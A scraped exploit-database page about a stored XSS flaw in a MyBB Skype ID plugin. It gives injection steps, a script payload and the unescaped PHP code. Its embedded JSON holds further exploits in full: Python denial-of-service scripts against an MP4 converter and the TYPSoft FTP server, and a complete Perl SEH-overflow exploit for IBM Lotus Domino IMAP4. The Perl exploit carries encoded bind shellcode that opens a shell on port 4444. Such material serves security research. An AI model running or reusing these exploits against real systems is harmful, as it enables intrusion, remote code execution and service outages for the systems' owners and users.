Search...

MyBB User Profile Skype ID Plugin 1.0 Stored XSS Vulnerability

2012-12-17T00:00:00

ID 1337DAY-ID-19992
Type zdt
Reporter limb0
Modified 2012-12-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Profile Skype ID MyBB Plugin Stored XSS
# Date: 14/12/2012
# Exploit Author: limb0
# Vendor Homepage: http://www.dragonknightz.net/
# Software Link: http://mods.mybb.com/view/user-profile-skype-id
# Version: 1.0
# Category:Web Security
# Tested on: Linux
 
+------------------------------------------------------------+
Stored XSS-Instructions
1.Install&Activate plugin
2.Go to UserCP &gt;&gt; Edit Profile &gt;&gt;  Skype ID:
3.Inject your string(xss) ex. "&gt;&lt;script&gt;alert("Skype ID XSS")&lt;/script&gt;
4.Visit your profile and voila
 
Proof
Inject:https://imageshack.us/photo/my-images/22/screenshotfrom201212141.png/
Result:https://imageshack.us/photo/my-images/41/screenshotfrom201212141.png/
+-------------------------------------------------------------+
 
Vulnerable code:
function profileskype_update($skype)
{
  global $mybb;
  if (isset($mybb-&gt;input['skype']))
   {
      $skype-&gt;user_update_data['skype'] = $mybb-&gt;input['skype'];
   }
}

#  0day.today [2018-03-12]  #

JSON Vulners Source

Initial Source

{"published": "2012-12-17T00:00:00", "id": "1337DAY-ID-19992", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:20:54", "bulletin": {"published": "2012-12-17T00:00:00", "id": "1337DAY-ID-19992", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 1.9, "modified": "2016-04-20T00:20:54"}}, "hash": "babcf8cb22a1c1d6b2bae0a5947c63eaeeffce7864a6c4d2be59539ec4c1a373", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T00:20:54", "edition": 1, "title": "MyBB User Profile Skype ID Plugin 1.0 Stored XSS Vulnerability", "href": "http://0day.today/exploit/description/19992", "modified": "2012-12-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/19992", "references": [], "reporter": "limb0", "sourceData": "# Exploit Title: Profile Skype ID MyBB Plugin Stored XSS\r\n# Date: 14/12/2012\r\n# Exploit Author: limb0\r\n# Vendor Homepage: http://www.dragonknightz.net/\r\n# Software Link: http://mods.mybb.com/view/user-profile-skype-id\r\n# Version: 1.0\r\n# Category:Web Security\r\n# Tested on: Linux\r\n \r\n+------------------------------------------------------------+\r\nStored XSS-Instructions\r\n1.Install&Activate plugin\r\n2.Go to UserCP >> Edit Profile >> Skype ID:\r\n3.Inject your string(xss) ex. \"><script>alert(\"Skype ID XSS\")</script>\r\n4.Visit your profile and voila\r\n \r\nProof\r\nInject:https://imageshack.us/photo/my-images/22/screenshotfrom201212141.png/\r\nResult:https://imageshack.us/photo/my-images/41/screenshotfrom201212141.png/\r\n+-------------------------------------------------------------+\r\n \r\nVulnerable code:\r\nfunction profileskype_update($skype)\r\n{\r\n global $mybb;\r\n if (isset($mybb->input['skype']))\r\n {\r\n $skype->user_update_data['skype'] = $mybb->input['skype'];\r\n }\r\n}\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "5e5843977e6f4b7af4f5861db25810a9", "key": "sourceHref"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "38c4e9e5a046adab6f567a3418bcde9a", "key": "modified"}, {"hash": "a89abf7f6d417790247f0eaa1fbf283a", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "4f50fcd60c749c644cd222867c499047", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "38c4e9e5a046adab6f567a3418bcde9a", "key": "published"}, {"hash": "7f89421620f2131f772e4933e83a46d9", "key": "title"}, {"hash": "6fb30af411462271ed20e9046ec3bd77", "key": "href"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "206ea0ea3dde7d3f8278bbb9826051c47b1d725bff0d8638195fd8973d2546b7", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2018-03-13T01:07:22"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28270", "SECURITYVULNS:VULN:9066", "SECURITYVULNS:DOC:19992"]}, {"type": "zdt", "idList": ["1337DAY-ID-15410"]}], "modified": "2018-03-13T01:07:22"}, "vulnersScore": -0.2}, "type": "zdt", "lastseen": "2018-03-13T01:07:22", "edition": 2, "title": "MyBB User Profile Skype ID Plugin 1.0 Stored XSS Vulnerability", "href": "https://0day.today/exploit/description/19992", "modified": "2012-12-17T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/19992", "references": [], "reporter": "limb0", "sourceData": "# Exploit Title: Profile Skype ID MyBB Plugin Stored XSS\r\n# Date: 14/12/2012\r\n# Exploit Author: limb0\r\n# Vendor Homepage: http://www.dragonknightz.net/\r\n# Software Link: http://mods.mybb.com/view/user-profile-skype-id\r\n# Version: 1.0\r\n# Category:Web Security\r\n# Tested on: Linux\r\n \r\n+------------------------------------------------------------+\r\nStored XSS-Instructions\r\n1.Install&Activate plugin\r\n2.Go to UserCP >> Edit Profile >> Skype ID:\r\n3.Inject your string(xss) ex. \"><script>alert(\"Skype ID XSS\")</script>\r\n4.Visit your profile and voila\r\n \r\nProof\r\nInject:https://imageshack.us/photo/my-images/22/screenshotfrom201212141.png/\r\nResult:https://imageshack.us/photo/my-images/41/screenshotfrom201212141.png/\r\n+-------------------------------------------------------------+\r\n \r\nVulnerable code:\r\nfunction profileskype_update($skype)\r\n{\r\n global $mybb;\r\n if (isset($mybb->input['skype']))\r\n {\r\n $skype->user_update_data['skype'] = $mybb->input['skype'];\r\n }\r\n}\n\n# 0day.today [2018-03-12] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "b01a073bb9cc707b76fd936b5a07d1bc", "key": "href"}, {"hash": "38c4e9e5a046adab6f567a3418bcde9a", "key": "modified"}, {"hash": "38c4e9e5a046adab6f567a3418bcde9a", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a89abf7f6d417790247f0eaa1fbf283a", "key": "reporter"}, {"hash": "e9d314c27f6a6d549b6c8099db48579a", "key": "sourceData"}, {"hash": "5bdaaca089ce75c953014fcade86623b", "key": "sourceHref"}, {"hash": "7f89421620f2131f772e4933e83a46d9", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"zdt": [{"lastseen": "2018-03-21T00:15:38", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2017-08-15T00:00:00", "published": "2017-08-15T00:00:00", "href": "https://0day.today/exploit/description/28270", "id": "1337DAY-ID-28270", "type": "zdt", "title": "Tomabo MP4 Converter 3.19.15 - Denial of Service Exploit", "sourceData": "#!/usr/bin/python\r\n \r\n# Exploit Title: Tomabo MP4 Converter DOS\r\n# Date: 13/08/17\r\n# Exploit Author: Andy Bowden\r\n# Vendor Homepage: http://www.tomabo.com/\r\n# Software Link: http://www.tomabo.com/mp4-converter/index.html\r\n# Version: 3.19.15\r\n# Tested on: Windows 7 x86\r\n# CVE : None\r\n \r\n#Generate a .m3u file using the python script and import it into the MP4 Converter.\r\n \r\nfile = \"crash.m3u\"\r\n \r\nbuffer = \"A\" * 550000\r\n \r\nf = open(file, \"w\")\r\nf.write(buffer)\r\nf.close()\r\n\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/28270", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-12-31T23:15:05", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2010-12-29T00:00:00", "published": "2010-12-29T00:00:00", "id": "1337DAY-ID-15410", "href": "https://0day.today/exploit/description/15410", "type": "zdt", "title": "TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service", "sourceData": "#!/usr/bin/python\r\n#\r\n# TYPSoft FTP Server (v 1.10) RETR CMD Denial Of Service\r\n#\r\n# CVE-2005-3294\r\n# OSVDB 19992\r\n#\r\n# 12/23/2010\r\n# (C) Emanuele Gentili <[email\u00a0protected]>\r\n#\r\n# Notes:\r\n# I have wrote this exploit because the code published here (1) do not work correctly.\r\n# (1) http://www.exploit-db.com/exploits/12604/\r\n#\r\n \r\nimport socket\r\nimport sys\r\n \r\nuser=\"test\"\r\npwd=\"test\"\r\nbuffer=\"\\x41\"\r\n \r\nprint(\"\\n TYPSoft FTP Server (V 1.10) RETR CMD Denial Of Service\\n\")\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((\"192.168.0.109\",21))\r\ndata = s.recv(1024)\r\nprint(\"[+] Sending user login...\")\r\ns.send(\"USER \" + user + '\\r\\n')\r\ndata = s.recv(1024)\r\ns.send(\"PASS \" + pwd + '\\r\\n')\r\ndata = s.recv(1024)\r\nprint(\"[+] Sending first exploit stage...\")\r\ns.send(\"RETR \" + buffer + '\\r\\n')\r\ndata = s.recv(1024)\r\nprint(\"[+] Sending second exploit stage...\\n\")\r\ns.send(\"RETR \" + buffer + '\\r\\n')\r\ndata = s.recv(1024)\r\ns.close()\r\n\r\n\n\n# 0day.today [2017-12-31] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/15410"}, {"lastseen": "2018-03-21T00:07:10", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category remote exploits", "modified": "2007-10-27T00:00:00", "published": "2007-10-27T00:00:00", "id": "1337DAY-ID-9066", "href": "https://0day.today/exploit/description/9066", "type": "zdt", "title": "IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit", "sourceData": "===========================================================\r\nIBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit\r\n===========================================================\r\n\r\n\r\n#!perl\r\n#\r\n# \"IBM Lotus Domino\" IMAP4 Server 'LSUB' Command Exploit\r\n#\r\n# Author: Manuel Santamarina Suarez\r\n# e-Mail: [email\u00a0protected]\r\n#\r\n\r\nuse IO::Socket;\r\nuse File::Basename;\r\n\r\n#\r\n# destination TCP port\r\n#\r\n$port = 143;\r\n\r\n#\r\n# SE handler\r\n#\r\n# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)\r\n# You must use a POP/POP/RET sequence that doesn't modify the ESP register or\r\n# the shellcode decoder will fail.\r\n#\r\n$seh = reverse( \"\\x60\\x21\\x53\\x4E\" ); # POP EDI/POP EBP/RET\r\n # nnotes.6021534e\r\n # universal on Lotus Domino 7.0.2FP1\r\n\r\n\r\n#\r\n# Shellcode\r\n# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)\r\n#\r\n# 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444)\r\n# 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP)\r\n#\r\n$sc = \"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI\".\r\n \"JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS\".\r\n \"7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV\".\r\n \"bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3\".\r\n \"OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo\".\r\n \"ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo\".\r\n \"btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp\".\r\n \"ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc\".\r\n \"hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M\".\r\n \"HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70\".\r\n \"YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs\".\r\n \"RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA\";\r\n\r\n#\r\n# JUMP to 'ESP adjustment' and shellcode\r\n#\r\n$jmp = \"\\x74\\x20\". # JE SHORT\r\n \"\\x75\\x20\"; # JNZ SHORT\r\n\r\n\r\n#\r\n#\r\n# Don't edit anything after this line\r\n#\r\n#\r\n\r\n$sc_limit = 2300;\r\n\r\nsub usage {\r\n print \"Usage: \" . basename( $0 ) . \" [target] [IPv4 address] [username] [password]\\n\".\r\n \"Example: \". basename( $0 ) . \" 1 192.168.1.19 \\\"Bill Gates/ServerName\\\" \\\"P4ssw0rd\\\"\\n\".\r\n \"\\n\".\r\n \"Targets:\\n\".\r\n \"[1] Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4\\n\".\r\n \"[2] Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2\\n\";\r\n exit;\r\n}\r\n\r\n\r\n# Net::IP::ip_is_ipv4\r\nsub ip_is_ipv4 {\r\n my $ip = shift;\r\n\r\n unless ($ip =~ m/^[\\d\\.]+$/) {\r\n return 0;\r\n }\r\n\r\n if ($ip =~ m/^\\./) {\r\n return 0;\r\n }\r\n\r\n if ($ip =~ m/\\.$/) {\r\n return 0;\r\n }\r\n\r\n if ($ip =~ m/^(\\d+)$/ and $1 < 256) {\r\n return 1\r\n }\r\n\r\n my $n = ($ip =~ tr/\\./\\./);\r\n\r\n unless ($n >= 0 and $n < 4) {\r\n return 0;\r\n }\r\n\r\n if ($ip =~ m/\\.\\./) {\r\n return 0;\r\n }\r\n\r\n foreach (split /\\./, $ip) {\r\n unless ($_ >= 0 and $_ < 256) {\r\n return 0;\r\n }\r\n }\r\n \r\n return 1;\r\n}\r\n\r\n\r\nprint \"--------------------------------------------------------\\n\".\r\n ' \"IBM Lotus Domino\" IMAP4 Server \\'LSUB\\' Command Exploit'.\"\\n\".\r\n \"--------------------------------------------------------\\n\\n\";\r\n\r\nif( ($#ARGV+1) != 4 ) {\r\n &usage;\r\n}\r\n\r\n$user = $ARGV[2];\r\n$pass = $ARGV[3];\r\n\r\n# Windows 2000 SP4\r\nif( $ARGV[0] == 1 ) {\r\n $popad = \"\\x41\" x 3 . # INC ECX\r\n \"\\x61\" x 51; # POPAD\r\n}\r\n# Windows 2003 SP2\r\nelsif( $ARGV[0] == 2 ) {\r\n $popad = \"\\x41\" x 2 . # INC ECX\r\n \"\\x61\" x 52; # POPAD\r\n}\r\nelse {\r\n &usage;\r\n}\r\n \r\nif( ip_is_ipv4( $ARGV[1] ) ) {\r\n $ip = $ARGV[1];\r\n}\r\nelse\r\n{\r\n &usage;\r\n}\r\n\r\nif( length( $sc ) > $sc_limit ) {\r\n print \"[-] Error: Shellcode's size exceeds $sc_limit bytes!\\n\";\r\n exit;\r\n}\r\n\r\nprint \"[+] Connecting to $ip:$port...\\n\";\r\n\r\n$sock = IO::Socket::INET->new (\r\n PeerAddr => $ip,\r\n PeerPort => $port,\r\n Proto => 'tcp',\r\n Timeout => 2\r\n) or print \"[-] Error: Couldn't establish a connection to $ip:$port!\\n\" and exit;\r\n\r\nprint \"[+] Connected.\\n\";\r\n\r\n$mailbox = \"\\x44\" x 280 . $jmp . $seh . \"\\x44\" x 26 . $popad . $sc . \"\\x44\" x 3000;\r\n$sock->recv( $recv, 1024 );\r\n$sock->send( \"a001 LOGIN \\\"$user\\\" \\\"$pass\\\"\\r\\n\" );\r\n$sock->recv( $recv, 1024 );\r\n\r\nif( $recv ne \"a001 OK LOGIN completed\\r\\n\" ) {\r\n print \"[-] Error: Invalid username or password!\\n\";\r\n exit;\r\n}\r\n\r\nprint \"[+] Successfully logged in.\\n\".\r\n \"[+] Trying to overwrite and control the SE handler...\\n\";\r\n\r\n$sock->send( \"a002 SUBSCRIBE {\" . length( $mailbox ) . \"}\\r\\n\" );\r\n$sock->recv( $recv, 1024 );\r\n$sock->send( \"$mailbox\\r\\n\" );\r\n$sock->recv( $recv, 1024 );\r\n$sock->send( \"a003 LSUB arg1 arg2\\r\\n\" );\r\nsleep( 3 );\r\nclose( $sock );\r\n\r\nprint \"[+] Done. Now check for a bind shell on $ip:4444!\\n\";\r\n\r\n\r\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/9066"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "description": " Asterisk Project Security Advisory - AST-2012-010\r\n\r\n Product Asterisk \r\n Summary Possible resource leak on uncompleted re-invite \r\n transactions \r\n Nature of Advisory Denial of Service \r\n Susceptibility Remote authenticated sessions \r\n Severity Minor \r\n Exploits Known No \r\n Reported On June 13, 2012 \r\n Reported By Steve Davies \r\n Posted On July 5, 2012 \r\n Last Updated On July 5, 2012 \r\n Advisory Contact Terry Wilson <twilson@digium.com> \r\n CVE Name TBD \r\n\r\n Description If Asterisk sends a re-invite and an endpoint responds to \r\n the re-invite with a provisional response but never sends a \r\n final response, then the SIP dialog structure is never \r\n freed and the RTP ports for the call are never released. If \r\n an attacker has the ability to place a call, they could \r\n create a denial of service by using all available RTP \r\n ports. \r\n\r\n Resolution A re-invite that receives a provisional response without a \r\n final response is detected and properly cleaned up at \r\n hangup. \r\n\r\n Affected Versions\r\n Product Release Series \r\n Asterisk Open Source 1.8.x All versions \r\n Asterisk Open Source 10.x All versions \r\n Asterisk Business Edition C.3.x All versions \r\n Certified Asterisk 1.8.11-certx All versions \r\n Asterisk Digiumphones 10.x.x-digiumphones All versions \r\n\r\n Corrected In\r\n Product Release \r\n Asterisk Open Source 1.8.13.1, 10.5.2 \r\n Asterisk Business Edition C.3.7.5 \r\n Certified Asterisk 1.8.11-cert4 \r\n Asterisk Digiumphones 10.5.2-digiumphones \r\n\r\n Patches \r\n URL Revision \r\n http://downloads.asterisk.org/pub/security/AST-2012-010-1.8.diff Asterisk \r\n 1.8 \r\n http://downloads.asterisk.org/pub/security/AST-2012-010-10.diff Asterisk \r\n 10 \r\n\r\n Links https://issues.asterisk.org/jira/browse/ASTERISK-19992 \r\n\r\n Asterisk Project Security Advisories are posted at \r\n http://www.asterisk.org/security \r\n \r\n This document may be superseded by later versions; if so, the latest \r\n version will be posted at \r\n http://downloads.digium.com/pub/security/AST-2012-010.pdf and \r\n http://downloads.digium.com/pub/security/AST-2012-010.html \r\n\r\n Revision History\r\n Date Editor Revisions Made \r\n 06/27/2012 Terry Wilson Initial Release \r\n\r\n Asterisk Project Security Advisory - AST-2012-010\r\n Copyright (c) 2012 Digium, Inc. All Rights Reserved.\r\n Permission is hereby granted to distribute and publish this advisory in its\r\n original, unaltered form.\r\n", "modified": "2012-07-11T00:00:00", "published": "2012-07-11T00:00:00", "id": "SECURITYVULNS:DOC:28270", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28270", "title": "AST-2012-010: Possible resource leak on uncompleted re-invite transactions", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "description": "Administrative access doesn't require authentication.", "modified": "2008-06-09T00:00:00", "published": "2008-06-09T00:00:00", "id": "SECURITYVULNS:VULN:9066", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9066", "title": "Network General Enterprise Administrator privilege escalation", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "Network General Enterprise Administrator (Network\r\nGeneral has been aquired by Net Scout):\r\nNon-privileged users can perform privileged functions by manipulating the URL. Can log on as user and using the\r\nfollowing URL conduct administrative functions:\r\nhttps://X.X.X.X/ResourceManager/en_US/domains/add_domain.jsp\r\n\r\nOther functions may be possible. It appears that the application only hides administrative functions from view\r\ninstead of validating authorization of user rights for action. Vulnerability may exist in the Network General\r\nVisualizer V2100 and Network General Infinistream i1730 Sniffer. I do not have resources to investigate further.", "modified": "2008-06-09T00:00:00", "published": "2008-06-09T00:00:00", "id": "SECURITYVULNS:DOC:19992", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19992", "title": "Vulnerability in Network General/Net Scout product", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}